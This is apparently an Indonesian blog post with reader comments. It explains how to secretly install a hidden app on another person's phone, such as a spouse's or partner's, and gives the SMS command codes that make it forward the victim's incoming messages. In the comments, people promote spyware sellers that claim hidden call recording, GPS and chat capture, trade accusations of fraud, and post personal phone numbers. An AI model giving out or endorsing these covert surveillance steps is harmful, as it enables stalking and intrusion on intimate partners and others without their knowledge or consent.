Cara Menyadap Sms Seseorang Melalui Aplikasi

Posted by Michael Js 00.52, under | 34 comments



M
engisi kegiatan liburan yang singkat sekaligus berbagi ilmu pengetahuan tentunya kegemaran setiap individual. Kali ini, admin my-bro mencoba berbagi ilmu sedikit bagaimana cara menyadap Hp (handphone) seseorang (baik itu istri, pacar, ataupun kenalan terdekat sobat).

Tetapi tutorial ini hanya menjelaskan bagaimana menyadap sms doang.
Jgn disalah gunakan. Tujuan dari penyadapan ini bukan atau tidak lain, hanya ingin melihat kesetian dari seseorang.


Langsung Saja:

Langkah Pertama

Download aplikasinya Disini


Langkah Kedua

Instal di Hp sobat dan di Hp Target/sasaran

Nb:
setelah di Instal di Hp, aplikasi program ini tidak bisa dilihat didalam ponsel. Jadi kita melakukan pengontrolan melalui pesan. Jadi, sebelum di instal sebaiknya dikirim dulu programnya ke HP target jika melalui bluetooth.


Langkah Ketiga

Setelah terinstal di Hp Target/sasaran, maka ketik format seperti ini:

SA (spasi) (password) (spasi) ON
*maksimal password 8 digit

Contoh : SA 12345678 ON

Kirim ke nomor sobat.
Maka otomatis, program ini menjadi aktif.


Langkah Keempat

Jika ingin langganan menyadap setiap pesan yg masuk ke ponsel korban maka ketik format dibawah ini di ponsel target/sasaran:

SA (spasi) (password) (spasi) R1

Contoh : SA 12345678 R1


Jika ingin berhenti langganan sms dari si korban/target tapi programnya tetap aktif maka format pengetikannya:

SA (spasi) (password) (spasi) R0

Untuk mematikan programnya adalah dengan cara, ketik:

SA (spasi) (password) (spasi) OFF


Mulai sekarang, kesetian atau kejujuran itu sulit untuk didapatkan jadi berhati-hatilah jaga Handphone sobat...

Mana tau admin sudah menyadap ponsel sobat....
hhee....


34 komentar:

Banyak yang bingung softwarenya gak runing well, ,mungkin karena softwarenya gak kompatible buat type handphonenya.
Saran saya biar gak pusing2 cari software penyadap hp, lebih baik langsung download di www.2mata.net
Aplikasi penyadap bermacam2 type hp, fiturnya dapat menyadap SMS, BBM chatt, EMAIL, GPS, mendengar percakapan telpon target, melihat secara real apa yang ada dimonitor target bahkan dapat melihat folder photo dalam hp target.

Sippss masbro ...
Sarannya sangat bermanfaat
terima kasih

2mata.net@itukan jualannya www.bloove.com/id kenapa anda yg jualan....?

Saya mau ty pake iPhone bisa nggak...? Mksh

Pake iPhone bisa nggak ...? Mksh

apakah aplikasi ini termaksut pesan keluar, masuk telpon keluar & masuk???

@vonie = kurang tahu juga, apakah software ini support terhadap Iphone krn setau admin, aplikasi ini khusus untuk Hp yg memiliki tipe symbian atau java
kalau mau di coba, gak apa-apa juga, trim's

@Anonim = aplikasi ini hanya menyadap pesan doang, kalau telfon tidak bisa Gan

, yang buat hp java ada gak ya?

mengotrol nya gimana ??

mengotrol nya gimana ??

tidak ada sistem pengontrolan Gan ...
secara otomatis pesan si korban akan terkirim dg sendirinya (jika di aktifkan)

@andri : untuk java belum tahu gan,

apakah pulsa sikorban akan berkurang

hati2 dng yg ditawarkan 2mata.net, penipuan..

kalo hape target java dan hape saya android bisa gak?

@mita = belum pernah coba yg demikian sis ...
biasanyanya harus sejenis tipe OS nya...
sebab, ini aplikasi ...
muncul sebelum adanya OS dari android,

tapi kalau mau di coba silahkan mbak sis :)

gx bisa beroprasi gue pake sis

ada gx yg buat nokia c2_02
klo ada info ke no hp
085381182747
thank

buat bb 9800 ada g, klo ada sms 082342376376 tlg dibantu

buat bb 9800 ada g, klo ada sms 082342376376 tlg dibantu

JURAGAN: utk mengelabuhi hal ygdemikian biasanya korban itu memakai hp yg murahan sehingga sulit utk dilacak.......saran klo ada tolong aplikasi ini berlaku utk yg semua jenis HP SEHINGGA KITA HANYA MEMASUKKAN NO HP KORBAN SAJA ...dan itu bisa kita lacak. trimakasih

JURAGAN: utk mengelabuhi hal ygdemikian biasanya korban itu memakai hp yg murahan sehingga sulit utk dilacak.......saran klo ada tolong aplikasi ini berlaku utk yg semua jenis HP SEHINGGA KITA HANYA MEMASUKKAN NO HP KORBAN SAJA ...dan itu bisa kita lacak. trimakasih

cobain ini deh, aku udah coba sendiri http://penyadapphone.blogspot.com
indahnya berbagi...

Jangan pernah coba masuk ke web http://penyadapphone.blogspot.com ini WEB PENIPUAN !!! Kalau kita pesan actionnya cepat sekali melalui transfer dan pulsa, giliran ditanya kapan jadinya ? ga mau jawab, dengan alasan 1001 ...

Biar mampus tuh makan duit orang ... Semoga masuk neraka luh !

Jangan sampai jadi korban berikutnya

ini asli ga? saya pingin pesen rombongan... saya dari keluarga kepolisian... kira2 saya pesan untuk di terapkan di 25orang. bisa ketemu langsung ga? biar jelas.. kalo bener bekerja saya kasih harga 2x lipat. tolong yg buat web ini demontrasi kan cara kerja,dan cara install di depan kami.. 082120646408

Hayooooo....Admin itu ada keluarga Dari Kepolisian,,silahkan di demonstrasikan,,,kalau anda bener tahu dan sudah mempelajari softwarenya.....!!!!aku juga mau lihat dong...hhhhhhhhh

Komentar ini telah dihapus oleh penulis.

Alhamdulillah gw udah pernah pake aplikasi sadap di 2mata.net
semua lancar2 aja, gw pernah tanya ama ownernya, pelanggannya udah 1200 orang, jadi menurut gw wajar aja gak bisa muasin orang segitu banyaknya.
i think so far so good, service is good, price is more cheapest than other spyphone

Saya punya 2 aplikasi yg sudah modifikasi, APP yang 1. hanya untuk sms in/out saja real time. APP yang 2.untuk mengetahui sms in/out real time ( fwd>2 cara -nmr.tlpn atau email atau keduanya), record phone in/out realtime suara jernih ( fwd>2 cara -nmr.tlpn atau email atau keduanya), GPS real time, dll real time juga, aplikasi stlh diinstall tidak terdeteksi alias hidden(ga ada icon).bahkan bila hp stlh dinstall app ini SEMUA SMS akan terbaca, MULAI hp baru pertama dipakai, meskipun sudah lama sekali dipakai, asal blm pernah di reset factory (format).bisa digunakan selamanya setelah diinstall ( 5 menit install).App ini HANYA untuk ANDROID.Bisa pesan HP langsung tinggal Pakai (complete) Mohon maaf, Hanya untuk yg sudah berkeluarga atau orang tua saja (buat anaknya), Pimp.Perusahaan untuk Karyawan.S&K berlaku.085748973972Menerima Konsultasi Panggilan.

Yang jualan tapi punya modus utk nipu, silahkan angkat tangan dan GO TO HELL ..

Gmn mw nginstall di HP target kan orgnya jauuhh

Gmn mw nginstall di HP target kan orgnya jauuhh

Samsung S4 mini pcr sya sudah ada jadi gk repot2 mikirin wat nyadap.

Poskan Komentar

Jika masih membingungkan, silahkan tinggalkan komentar